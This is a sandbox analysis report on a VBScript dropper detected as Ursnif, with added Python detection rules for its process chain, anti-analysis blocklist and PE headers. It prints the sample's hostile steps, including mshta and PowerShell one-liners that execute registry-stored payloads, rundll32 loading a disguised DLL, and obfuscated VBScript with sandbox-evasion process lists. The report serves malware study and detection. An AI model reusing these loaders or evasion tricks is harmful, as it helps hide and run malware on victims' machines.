Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Dhqv='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dhqv).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB252.tmp' 'c:\Users\user\AppData\Local\Temp\kuljoghz\CSCFD41DB177D83417DAD6FB740EC17B379.TMP'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESC397.tmp' 'c:\Users\user\AppData\Local\Temp\cshxvr3e\CSC395E5146EDFE427593BFE3FCA45BE18C.TMP'
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.cmdline' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.cmdline' Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB252.tmp' 'c:\Users\user\AppData\Local\Temp\kuljoghz\CSCFD41DB177D83417DAD6FB740EC17B379.TMP' Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESC397.tmp' 'c:\Users\user\AppData\Local\Temp\cshxvr3e\CSC395E5146EDFE427593BFE3FCA45BE18C.TMP' Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
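What the process lines above amount to: wscript.exe drops fum.cpp and asks WMI (Win32_Process::Create, so WmiPrvSE.exe rather than wscript.exe is the recorded parent) to run it through rundll32 with the DllRegisterServer export; the mshta one-liner evals JScript read back from HKCU\...\DeviceFile; PowerShell, started by mshta, runs the ASCII-decoded bytes of the UtilTool value through iex and then compiles C# helpers out of %TEMP% with csc.exe. The following is an added example, not part of the sandbox report: Python rules for those steps, run over process-creation records transcribed from the lines above. The ProcEvent field layout, the rule names and the benign control record are assumptions made for the example, not a SIEM schema.

```python
"""Added example (not part of the sandbox report): rules for the process chain
recorded above, run over constructed process-creation records.  The ProcEvent
layout and the rule names are assumptions for this example, not a SIEM schema."""
import os
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class ProcEvent:
    image: str          # full path of the created process
    parent_image: str   # full path of the creating process ("unknown" when not recorded)
    command_line: str


def _name(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


PE_EXTENSIONS = {".dll", ".exe", ".ocx", ".cpl", ".drv", ".scr"}
# first argument of rundll32, up to the comma that precedes the export name
RUNDLL_TARGET = re.compile(r"""rundll32(?:\.exe)?['"]?\s+['"]?([^'",\s]+)\s*,""", re.IGNORECASE)
IEX = re.compile(r"\b(?:iex|invoke-expression)\b", re.IGNORECASE)
REGISTRY_READ = re.compile(r"\b(?:gp|get-itemproperty|get-itempropertyvalue|regread)\b|\bHK(?:CU|LM|EY_)",
                           re.IGNORECASE)
HTA_INLINE = re.compile(r"about:|<script|activexobject|regread", re.IGNORECASE)
TEMP_CMDLINE = re.compile(r"""@['"]?[^'"]*\\AppData\\Local\\Temp\\[^'"]*\.cmdline""", re.IGNORECASE)


def classify(ev: ProcEvent) -> List[str]:
    """Names of the rules the event trips, in evaluation order (empty if none)."""
    hits = []
    img, parent, cmd = _name(ev.image), _name(ev.parent_image), ev.command_line
    if img == "rundll32.exe":
        if parent == "wmiprvse.exe":          # Win32_Process::Create issued over WMI
            hits.append("wmi_spawned_rundll32")
        m = RUNDLL_TARGET.search(cmd)
        if m and os.path.splitext(_name(m.group(1)))[1] not in PE_EXTENSIONS:
            hits.append("rundll32_loads_non_dll_extension")   # fum.cpp,DllRegisterServer
    elif img == "mshta.exe" and HTA_INLINE.search(cmd):
        hits.append("mshta_inline_hta_reads_registry")
    elif img == "powershell.exe":
        if parent == "mshta.exe":
            hits.append("mshta_spawned_powershell")
        if IEX.search(cmd) and REGISTRY_READ.search(cmd):
            hits.append("powershell_iex_payload_from_registry")
    elif img == "csc.exe" and parent == "powershell.exe" and TEMP_CMDLINE.search(cmd):
        hits.append("powershell_compiles_csharp_from_temp")
    return hits


def analyze(events: List[ProcEvent]) -> Dict[int, List[str]]:
    """Index of each event that trips at least one rule -> the rule names."""
    result = {}
    for i, ev in enumerate(events):
        hits = classify(ev)
        if hits:
            result[i] = hits
    return result


# Constructed records transcribed from the report's process-creation lines, plus one
# benign control (an interactive PowerShell started from explorer.exe).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\wscript.exe", "unknown",
              r"C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\sample.vbs'"),
    ProcEvent(r"C:\Windows\System32\rundll32.exe", r"C:\Windows\System32\wbem\WmiPrvSE.exe",
              r"rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer"),
    ProcEvent(r"C:\Windows\System32\mshta.exe", "unknown",
              r"'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Dhqv='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dhqv).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\System32\mshta.exe",
              r"'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))"),
    ProcEvent(r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.cmdline'"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\explorer.exe",
              r"powershell.exe -NoProfile -Command Get-Date"),
]

if __name__ == "__main__":
    for i, rules in analyze(SAMPLE_EVENTS).items():
        print(i, _name(SAMPLE_EVENTS[i].image), rules)
```

Each rule keys on the parent/child pair or on the shape of the command line, not on this sample's paths or GUID, so it carries over to other droppers that use the same loader pattern. Note the parent for the first rundll32 is WmiPrvSE.exe because the script went through Win32_Process::Create; a rule that only looks for wscript.exe as the parent misses this step entirely.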
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20210910 Jump to behavior
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\adobe.url Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winVBS@22/20@7/1
Source: C:\Windows\System32\mshta.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll (6 occurrences) Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_00F22102 CreateToolhelp32Snapshot,Process32First,StrStrIA,Process32Next,CloseHandle, 18_2_00F22102
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{B68F86DF-9DC3-5870-D74A-210CFB1EE500}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3284:120:WilError_01
Source: C:\Windows\SysWOW64\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{F660447E-DDE3-9893-178A-614C3B5E2540}
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\sample.vbs'
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: sample.vbs Static file information: File size 1397160 > 1048576
Source: Binary string: :C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.pdb source: powershell.exe, 00000016.00000002.885375764.00000200B1621000.00000004.00000001.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.pdbXP=a source: powershell.exe, 00000016.00000002.885459267.00000200B1696000.00000004.00000001.sdmp
Source: Binary string: c:\Led-Flower\Spell\cotton_point\please.pdb source: wscript.exe, 00000000.00000003.540443568.000001C497429000.00000004.00000001.sdmp, fum.cpp.0.dr
Source: Binary string: :C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.pdb source: powershell.exe, 00000016.00000002.885375764.00000200B1621000.00000004.00000001.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.pdbXP=a source: powershell.exe, 00000016.00000002.885375764.00000200B1621000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb source: rundll32.exe, 00000012.00000003.867779108.0000000005C00000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000012.00000003.867779108.0000000005C00000.00000004.00000001.sdmp

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.Sleep Int((Theodosian-AFQ+1)*Rnd+AFQ)REM diary character casework. 6326440 Fayetteville flaxen Doolittle Ballard backpack Alcoa loyal offertory Nicaragua axe Toni End WithEAX = MsgBox("Cant start because MSVCR101.dll is missing from your computer. Try reinstalling the program to fix this problem.", vbSystemModal+vbCritical, "System Error")Gnk("DEBUG: F_MESSAGE - True")REM bow megabyte plenitude aspirate stationery. handicapper nit frozen restaurateur Tennessee Millikan hark limerick Macedon camel Brandon hereunto disquisition plasm anatomic End FunctionFunction yNzk()Gnk("DEBUG: FS_PROCESS - Start")REM emboss indigestion surly rebuttal Kaskaskia upslope lightface stimulus vintner tabernacle male shy inhibit bravado mozzarella otherwise Gnk("DEBUG: FS_PROCESSCOUNT - Start")on error resume nextDim Theodosian,AFQTheodosian=6000' elongate conjoin protactinium monocular warplane riot rubidium bebop skyward contributory metabole stepchild lenticular rich fleabane Frisian AFQ=3000Randomize' thieving Kurt sovereign Simpson, anthropomorphic rhombic Monica loan transpose larch least farmhouse mercuric, tabletop hoosegow highboy camelopard WScript.Sleep Int((Theodosian-AFQ+1)*Rnd+AFQ)yDVFproc = ((((42 + (-27.0)) + 343.0) - 276.0) + (-82.0))wSQ = 
Array("frida-winjector-helper-64.exe","frida-winjector-helper-32.exe","pythonw.exe","pyw.exe","cmdvirth.exe","alive.exe","filewatcherservice.exe","ngvmsvc.exe","sandboxierpcss.exe","analyzer.exe","fortitracer.exe","nsverctl.exe","sbiectrl.exe","angar2.exe","goatcasper.exe","ollydbg.exe","sbiesvc.exe","apimonitor.exe","GoatClientApp.exe","peid.exe","scanhost.exe","apispy.exe","hiew32.exe","perl.exe","scktool.exe","apispy32.exe","hookanaapp.exe","petools.exe","sdclt.exe","asura.exe","hookexplorer.exe","pexplorer.exe","sftdcc.exe","autorepgui.exe","httplog.exe","ping.exe","shutdownmon.exe","autoruns.exe","icesword.exe","pr0c3xp.exe","sniffhit.exe","autorunsc.exe","iclicker-release.exe",".exe","prince.exe","snoop.exe","autoscreenshotter.exe","idag.exe","procanalyzer.exe","spkrmon.exe","avctestsuite.exe","idag64.exe","processhacker.exe","sysanalyzer.exe","avz.exe","idaq.exe","processmemdump.exe","syser.exe","behaviordumper.exe","immunitydebugger.exe","procexp.exe","systemexplorer.exe","bindiff.exe","importrec.exe","procexp64.exe","systemexplorerservice.exe","BTPTrayIcon.exe","imul.exe","procmon.exe","sython.exe","capturebat.exe","Infoclient.exe","procmon64.exe","taskmgr.exe","cdb.exe","installrite.exe","python.exe","taslogin.exe","ipfs.exe","pythonw.exe","tcpdump.exe","clicksharelauncher.exe","iprosetmonitor.exe","qq.exe","tcpview.exe","closepopup.exe","iragent.exe","qqffo.exe","timeout.exe","commview.exe","iris.exe","qqprotect.exe","totalcmd.exe","cports.exe","joeboxcontrol.exe","qqsg.exe","trojdie.kvpcrossfire.exe","joeboxserver.exe","raptorclient.exe","txplatform.exe","dnf.exe","lamer.exe","regmon.exe","virus.exe","dsniff.exe","LogHTTP.exe","regshot.exe","vx.exe","dumpcap.exe","lordpe.exe","RepMgr64.exe","win
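The captured VBScript above carries its anti-analysis list as a VBScript Array of process names (the upper-cased copies of the same names reappear later in the report under "Tries to detect sandboxes and other dynamic analysis tools") and pads its run time with WScript.Sleep Int((Theodosian-AFQ+1)*Rnd+AFQ). The following is an added example, not code from the sample or from the report: Python that pulls the string arrays and the sleep bounds out of a script capture of this shape and checks a process list against the blocklist. The excerpt is constructed from a handful of the names shown above (the report's list is far longer and is cut off in the capture), and the running-process list is constructed as well.

```python
"""Added example (not part of the sandbox report): extract the process-name
blocklist and the randomised sleep bounds from an AMSI capture of this shape."""
import re

# Constructed excerpt of the AMSI-captured VBScript shown above, reduced to a few of
# the process names; the bare ".exe" entry is kept because it appears in the capture.
VBS_EXCERPT = r'''Gnk("DEBUG: FS_PROCESSCOUNT - Start")
on error resume next
Dim Theodosian,AFQ
Theodosian=6000' elongate conjoin protactinium monocular
AFQ=3000
Randomize' thieving Kurt sovereign Simpson
WScript.Sleep Int((Theodosian-AFQ+1)*Rnd+AFQ)
wSQ = Array("frida-winjector-helper-64.exe","pythonw.exe","sandboxierpcss.exe","ollydbg.exe","procmon.exe","procmon64.exe","procexp64.exe","idaq.exe",".exe","taskmgr.exe","tcpdump.exe","windbg.exe")
'''

ARRAY_ASSIGN = re.compile(r'(\w+)\s*=\s*Array\(((?:\s*"[^"]*"\s*,?)+)\)', re.IGNORECASE)
INT_ASSIGN = re.compile(r"^\s*(\w+)\s*=\s*(\d+)\s*(?:'.*)?$", re.MULTILINE)   # allows a trailing ' comment
RANDOM_SLEEP = re.compile(r"Sleep\s+Int\(\((\w+)-(\w+)\+1\)\*Rnd\+(\w+)\)", re.IGNORECASE)


def extract_string_arrays(script: str) -> dict:
    """{variable: [strings]} for every `x = Array("a","b",...)` in the script."""
    return {name: re.findall(r'"([^"]*)"', body) for name, body in ARRAY_ASSIGN.findall(script)}


def sleep_bounds_ms(script: str):
    """Min/max of WScript.Sleep Int((hi-lo+1)*Rnd+base).

    VBScript's Rnd is in [0, 1), so Int(...) ranges from base to base+(hi-lo) inclusive.
    Returns None when the pattern or one of its constants is not present."""
    consts = {n: int(v) for n, v in INT_ASSIGN.findall(script)}
    m = RANDOM_SLEEP.search(script)
    if not m or not all(g in consts for g in m.groups()):
        return None
    hi, lo, base = (consts[g] for g in m.groups())
    return base, base + (hi - lo)


def blocklisted_process_names(script: str) -> set:
    """Process names the script compares against; the bare '.exe' entry is dropped
    because, as a substring match, it would flag every process on the host."""
    names = set()
    for values in extract_string_arrays(script).values():
        names.update(v.lower() for v in values if v.lower().endswith(".exe") and len(v) > len(".exe"))
    return names


def blocklist_hits(script: str, running: list) -> list:
    """Running process names (compared case-insensitively) that would make the script bail out."""
    names = blocklisted_process_names(script)
    return sorted(p for p in running if p.lower() in names)


if __name__ == "__main__":
    # Constructed process list standing in for the output of a process enumeration.
    print(sleep_bounds_ms(VBS_EXCERPT))
    print(blocklist_hits(VBS_EXCERPT, ["explorer.exe", "procmon64.exe", "OllyDbg.exe", "svchost.exe"]))
```

With the constants from the capture the sleep lands between 3000 and 6000 ms, short enough to survive a sandbox timeout but enough to stagger the WMI queries that follow; the extracted names double as a tool-renaming checklist for an analysis VM.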
Suspicious powershell command line found
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_00F27AB0 push ecx; ret 18_2_00F27AB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_00F27E1F push ecx; ret 18_2_00F27E2F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_0575528F push ecx; ret 18_2_0575529F
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_05745529 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 18_2_05745529
Compiles C# or VB.Net code
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.cmdline' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.cmdline' Jump to behavior

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\fum.cpp Jump to dropped file
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.dll Jump to dropped file
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\fum.cpp Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.dll Jump to dropped file
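fum.cpp, dropped by wscript.exe and flagged above as a PE whose content does not match its extension, is loaded by rundll32 regardless of its name; the two csc.exe outputs (cshxvr3e.dll, kuljoghz.dll) were reported earlier with "No import functions for PE file found", meaning an empty import data directory, which fits the LoadLibraryA/GetProcAddress chain at 18_2_05745529 resolving APIs at run time. The following is an added example, not code from the report: Python that classifies a file by its header rather than its name and reads the import directory entry. The PE32+ header it builds for testing is constructed and has no sections, so it exercises only the header-level check; a real file needs the section table to map the import RVA before the imported names can be listed.

```python
"""Added example (not part of the sandbox report): header-based PE detection and
an empty-import-directory check, with a constructed PE32+ header for testing."""
import os
import struct

MZ_MAGIC = b"MZ"
PE_SIGNATURE = b"PE\0\0"
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B
IMAGE_DIRECTORY_ENTRY_IMPORT = 1
PE_EXTENSIONS = {".exe", ".dll", ".sys", ".ocx", ".cpl", ".scr", ".drv"}


def pe_signature_offset(data: bytes):
    """Offset of 'PE\\0\\0' when data starts with a consistent MZ/PE header pair, else None."""
    if len(data) < 0x40 or data[:2] != MZ_MAGIC:
        return None
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 4 + 20 > len(data) or data[e_lfanew:e_lfanew + 4] != PE_SIGNATURE:
        return None
    return e_lfanew


def import_directory(data: bytes):
    """(rva, size) of the import table data directory, or None when it cannot be read."""
    pe = pe_signature_offset(data)
    if pe is None:
        return None
    coff = pe + 4                                   # 20-byte COFF file header
    (size_of_optional,) = struct.unpack_from("<H", data, coff + 16)
    opt = coff + 20                                 # optional header follows the COFF header
    if size_of_optional < 2 or opt + size_of_optional > len(data):
        return None
    (magic,) = struct.unpack_from("<H", data, opt)
    count_offset = {PE32_MAGIC: 92, PE32PLUS_MAGIC: 108}.get(magic)   # NumberOfRvaAndSizes
    if count_offset is None or count_offset + 4 > size_of_optional:
        return None
    (n_dirs,) = struct.unpack_from("<I", data, opt + count_offset)
    if n_dirs <= IMAGE_DIRECTORY_ENTRY_IMPORT:
        return None                                 # image declares no import directory slot
    entry = opt + count_offset + 4 + 8 * IMAGE_DIRECTORY_ENTRY_IMPORT
    if entry + 8 > len(data):
        return None
    return struct.unpack_from("<II", data, entry)


def has_import_table(data: bytes) -> bool:
    """False for the 'No import functions for PE file found' case (zero RVA or size)."""
    d = import_directory(data)
    return d is not None and d[0] != 0 and d[1] != 0


def extension_mismatch(filename: str, data: bytes) -> bool:
    """True when the bytes are a PE image but the file name does not say so (fum.cpp)."""
    return (pe_signature_offset(data) is not None
            and os.path.splitext(filename)[1].lower() not in PE_EXTENSIONS)


def build_pe32plus_header(import_rva: int = 0, import_size: int = 0) -> bytes:
    """Constructed minimal PE32+ header (no DOS stub, no sections) for offline testing."""
    dos = bytearray(0x40)
    dos[:2] = MZ_MAGIC
    struct.pack_into("<I", dos, 0x3C, 0x40)                 # e_lfanew: PE header right after DOS header
    opt_size = 112 + 16 * 8                                 # PE32+ fixed fields + 16 data directories
    coff = struct.pack("<HHIIIHH", 0x8664, 0, 0, 0, 0, opt_size, 0x2022)   # AMD64, executable, DLL
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, PE32PLUS_MAGIC)
    struct.pack_into("<I", opt, 108, 16)                    # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 112 + 8 * IMAGE_DIRECTORY_ENTRY_IMPORT, import_rva, import_size)
    return bytes(dos) + PE_SIGNATURE + coff + bytes(opt)


if __name__ == "__main__":
    hdr = build_pe32plus_header()
    print("fum.cpp mismatch:", extension_mismatch("fum.cpp", hdr), "imports:", has_import_table(hdr))
```

An empty import directory is not proof of malice on its own (some packers and .NET native images look the same), but on a file that was dropped under a source-code extension and immediately handed to rundll32 it is the combination that matters.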

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match File source: 00000012.00000003.794954307.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794836470.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794735521.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.797221471.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794770084.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794874719.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794800647.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.859811207.0000000005BE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794900142.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794931081.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.801557253.000000000517C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6704, type: MEMORYSTR
Source: Yara match File source: 18.3.rundll32.exe.527a4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.3.rundll32.exe.527a4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.3.rundll32.exe.5328d48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.3.rundll32.exe.52f94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000012.00000002.871947216.0000000004FFF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.799908702.000000000527A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.799937952.00000000052F9000.00000004.00000040.sdmp, type: MEMORY
